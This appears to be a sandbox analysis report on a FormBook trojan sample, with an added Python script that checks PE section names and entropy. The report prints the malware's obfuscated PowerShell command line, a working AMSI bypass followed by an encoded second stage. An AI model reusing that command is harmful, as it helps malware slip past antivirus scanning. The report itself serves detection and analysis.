Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001BD84E 19_2_001BD84E
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001BE066 19_2_001BE066
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001BE94D 19_2_001BE94D
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001BDA23 19_2_001BDA23
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001BDB36 19_2_001BDB36
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001A2D90 19_2_001A2D90
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001A2D89 19_2_001A2D89
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001A9E30 19_2_001A9E30
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001BBE22 19_2_001BBE22
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001A2FB0 19_2_001A2FB0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\calc.exe Code function: String function: 033AB150 appears 35 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 02A8B150 appears 32 times
PE file contains more sections than normal
Source: s2rsXUiUn8.exe Static PE information: Number of sections : 11 > 10
Yara signature match
Source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.evad.winEXE@10/6@5/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20210722
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5436:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3084:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1pghm4uj.4m1.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\Desktop\s2rsXUiUn8.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts (observed 2 times)
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts (observed 2 times)
Source: s2rsXUiUn8.exe Metadefender: Detection: 17%
Source: s2rsXUiUn8.exe ReversingLabs: Detection: 57%
Source: unknown Process created: C:\Users\user\Desktop\s2rsXUiUn8.exe 'C:\Users\user\Desktop\s2rsXUiUn8.exe'
Source: C:\Users\user\Desktop\s2rsXUiUn8.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\s2rsXUiUn8.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,
41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\calc.exe {path}
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\WINDOWS\syswow64\calc.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: calc.pdbGCTL source: help.exe, 00000013.00000002.497718223.0000000002F8F000.00000004.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.298383788.0000000007180000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: calc.exe, 00000009.00000002.342996454.000000000349F000.00000040.00000001.sdmp, help.exe, 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp
Source: Binary string: calc.pdb source: help.exe, 00000013.00000002.497718223.0000000002F8F000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: calc.exe, help.exe
Source: Binary string: help.pdbGCTL source: calc.exe, 00000009.00000002.342338201.0000000002DD0000.00000040.00000001.sdmp
Source: Binary string: help.pdb source: calc.exe, 00000009.00000002.342338201.0000000002DD0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.298383788.0000000007180000.00000002.00000001.sdmp

Data Obfuscation:

Obfuscated command line found
Source: C:\Users\user\Desktop\s2rsXUiUn8.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,
41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
PE file contains sections with non-standard names
Source: s2rsXUiUn8.exe Static PE information: section name: .xdata
Source: s2rsXUiUn8.exe Static PE information: section name: .vmp0
Source: s2rsXUiUn8.exe Static PE information: section name: .cobf
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0041682D push es; retf 9_2_00416836
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0040102E push esp; iretd 9_2_0040102F
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0041A1B1 push ecx; iretd 9_2_0041A1B9
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0041CEF2 push eax; ret 9_2_0041CEF8
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0041CEFB push eax; ret 9_2_0041CF62
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0041CEA5 push eax; ret 9_2_0041CEF8
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0041CF5C push eax; ret 9_2_0041CF62
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_004177B7 push ebp; retf 9_2_004177B8
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033FD0D1 push ecx; ret 9_2_033FD0E4
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02ADD0D1 push ecx; ret 19_2_02ADD0E4
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001B682D push es; retf 19_2_001B6836
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001BA1B1 push ecx; iretd 19_2_001BA1B9
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001BD4A2 push FFFFFFB8h; retf 19_2_001BD4BC
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001BCEA5 push eax; ret 19_2_001BCEF8
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001BCEFB push eax; ret 19_2_001BCF62
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001BCEF2 push eax; ret 19_2_001BCEF8
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001BCF5C push eax; ret 19_2_001BCF62
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001B77B7 push ebp; retf 19_2_001B77B8
Source: initial sample Static PE information: section name: .vmp0 entropy: 7.19991970418
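The three static findings in this report, 11 sections (more than 10), the non-standard names .xdata, .vmp0 and .cobf, and entropy 7.2 in .vmp0, all come from one walk of the PE section table. The script below reproduces that walk and is an added example, not part of the report or of the sandbox; it runs on a minimal PE it constructs itself rather than on the sample (the sample's bytes are not in the report). The set of expected section names, the 7.0 entropy threshold and the 10-section limit are this example's assumptions. Of the three flagged names, .vmp0 is the section VMProtect writes and is a strong packer indicator on its own, whereas .xdata is ordinary x64 unwind data from MinGW-w64 builds and is weak evidence by itself.

```python
import math
import random
import struct

# Section names a plain MSVC/MinGW build is expected to carry. This set is the
# example's assumption, not the sandbox's list; .xdata is left out so the check
# flags it as the report does, even though MinGW-w64 emits it for x64 unwind data.
EXPECTED_SECTION_NAMES = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                          ".pdata", ".rsrc", ".reloc", ".tls", ".CRT"}


def shannon_entropy(raw):
    """Bits per byte: 0.0 for empty data, at most 8.0 for uniformly random bytes."""
    if not raw:
        return 0.0
    counts = [0] * 256
    for b in raw:
        counts[b] += 1
    n = len(raw)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(image):
    """Walk DOS header -> PE signature -> COFF header -> section table and
    return [(name, raw_bytes)] in file order."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", image, e_lfanew + 6)[0]        # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]   # COFF SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size
    sections = []
    for i in range(nsec):
        name, _vsize, _va, rawsize, rawptr = struct.unpack_from("<8sIIII", image, table + 40 * i)
        sections.append((name.rstrip(b"\0").decode("latin-1"), image[rawptr:rawptr + rawsize]))
    return sections


def assess(image, expected=EXPECTED_SECTION_NAMES, entropy_threshold=7.0, max_sections=10):
    """Reproduce the report's three static checks: section count, names, entropy.
    The 7.0 threshold is an assumption; the report shows 7.2 for .vmp0."""
    sections = parse_sections(image)
    report = {"section_count": len(sections), "entropy": {}, "findings": []}
    for name, raw in sections:
        h = shannon_entropy(raw)
        report["entropy"][name] = round(h, 3)
        if name not in expected:
            report["findings"].append(f"non-standard section name: {name}")
        if h >= entropy_threshold:
            report["findings"].append(f"high entropy {h:.2f} in {name}: packed or encrypted content")
    if len(sections) > max_sections:
        report["findings"].append(f"{len(sections)} sections > {max_sections}")
    return report


def build_sample_pe(sections):
    """Assemble a minimal PE32 image (DOS stub, PE signature, COFF header, zeroed
    optional header, section table, raw section data). Enough for the parser above,
    not loadable: constructed test data, not the sample from this report."""
    opt = struct.pack("<H", 0x10B) + b"\0" * 222          # PE32 optional header, 224 bytes
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x0102)
    headers_end = e_lfanew + 4 + len(coff) + len(opt) + 40 * len(sections)
    raw_base = (headers_end + 0x1FF) & ~0x1FF              # 0x200 file alignment
    table, body, rva = b"", b"", 0x1000
    for name, data in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode("ascii"), len(data), rva,
                             len(data), raw_base + len(body), 0, 0, 0, 0, 0x60000020)
        body += data
        rva += max(0x1000, (len(data) + 0xFFF) & ~0xFFF)
    return dos + b"PE\0\0" + coff + opt + table + b"\0" * (raw_base - headers_end) + body


_rng = random.Random(452684)                                    # seeded with the analysis ID
_random_blob = bytes(_rng.getrandbits(8) for _ in range(4096))  # stands in for packed code
_plain_code = bytes(range(64)) * 32                             # low-entropy filler, H = 6.0

# Eleven constructed sections, the three names the report flags among them.
SAMPLE_SECTIONS = [(".text", _plain_code), (".data", _plain_code), (".rdata", _plain_code),
                   (".pdata", _plain_code), (".xdata", _plain_code), (".bss", b""),
                   (".idata", _plain_code), (".CRT", _plain_code), (".tls", _plain_code),
                   (".vmp0", _random_blob), (".cobf", _random_blob)]
SAMPLE_PE = build_sample_pe(SAMPLE_SECTIONS)

if __name__ == "__main__":
    for line in assess(SAMPLE_PE)["findings"]:
        print(line)
```

To run it against a real file, pass open(path, "rb").read() to assess(). A high-entropy section is only a hint that code is packed or encrypted; the confirmation in this report is the behavioural one, the FormBook payload that only exists in the hollowed calc.exe and help.exe memory (the 9.2 and 19.2 Yara matches above), never in the file on disk.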

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xE3
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\SysWOW64\calc.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\calc.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 00000000001A98E4 second address: 00000000001A98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 00000000001A9B4E second address: 00000000001A9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_00409A80 rdtsc 9_2_00409A80
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4706 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4066 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3556 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 5884 Thread sleep time: -38000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\help.exe TID: 4732 Thread sleep time: -40000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 0000000A.00000000.303017451.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000000A.00000000.320295522.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.301912777.0000000008270000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000000A.00000000.280926242.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 0000000A.00000000.303675861.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 0000000A.00000000.329155939.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 0000000A.00000000.301912777.0000000008270000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000000A.00000000.301912777.0000000008270000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000000A.00000000.303675861.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 0000000A.00000000.301912777.0000000008270000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
